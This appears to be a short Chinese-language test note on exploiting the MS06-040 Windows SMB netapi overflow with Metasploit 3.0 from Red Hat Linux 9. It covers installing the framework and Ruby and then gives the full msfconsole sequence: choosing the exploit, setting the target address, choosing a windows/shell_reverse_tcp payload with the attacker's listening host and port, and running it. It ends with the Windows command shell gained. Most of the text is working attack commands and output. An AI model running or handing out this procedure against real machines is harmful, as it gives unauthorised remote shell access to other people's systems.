redhat linux 9下ms06_040漏洞溢出测试笔记
下载Metasploit Framework 3.0 (linux服务器溢出通用工具)
下载地址：
解压安装  framework-3.0.tar.gz
#tar -xzvf  framework-3.0.tar.gz
#cd framework-3.0
#./msfconsole
//出现画面：
       =[msf v3.0
+ -- --=[176 exploits -104 payloads
+ -- --=[17 encoders-5 nops
       =[30 aux

--/*-----------------
出现错误/usr/bin/nev: ruby: no foud file or diretory
需要安装Ruby
下载地址为:ftp://ftp.ruby-lang.org/pub/ruby/ruby-1.8.5.tar.gz
# ./configure
# make
# make install (run as root)
---*/-----------------

#show exploits //显示可用的exploit
#use windows/smb/ms06_040_netapi                 //打开一个exploit
msf exploit(ms06_040_netapi) > show options      //显示可用功能（参数）

 Name   current setting  required   desciption
 RHOST             yes      省略 
 RPORT    445      yes
 SMBPIPE  BROWSER  yes

exploit target:             
   id        name
    --        ---
    0   (wcscpt) automatic (NT4.0 2000 sp0-sp4 xp sp0-sp1) 

    0     // 代表自动，可选.0-5  可以用show targets 显示exploit支持的操作系统
                                 // 用set target  (0-5)  设置
msf exploit(ms06_040_netapi) > set RHOST 192.168.1.154   // (远程计算机，即溢出的计算机)
msf exploit(ms06_040_netapi) > set payload windows/shell_reverse_tcp  // (溢出后的方式反弹reverse tcp stager，
                                                                     //可用show payloads 显示，有好多种)
msf exploit(ms06_040_netapi) > set LHOST 192.168.1.155    //  (反弹本地计算机)
msf exploit(ms06_040_netapi) > set LPORT 4444             // (反弹本地计算机端口)      
设置好后
msf exploit(ms06_040_netapi) > exploit

成功后得到一个windows 系统shell
c:\windows\system32>